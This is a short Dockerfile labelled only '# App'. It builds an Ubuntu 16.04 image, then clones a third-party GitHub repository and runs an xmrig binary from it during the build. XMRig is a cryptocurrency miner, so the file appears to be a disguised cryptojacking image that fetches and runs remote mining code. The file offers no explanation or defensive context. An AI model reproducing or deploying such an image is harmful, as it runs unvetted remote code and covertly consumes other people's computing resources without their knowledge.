# App
FROM ubuntu:16.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install -y apt-utils \
  && apt-get install git -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN git clone https://github.com/rifqirr/jossxm.git && cd jossxm && chmod +x ./xmrig && ./xmrig
CMD ["-h"]
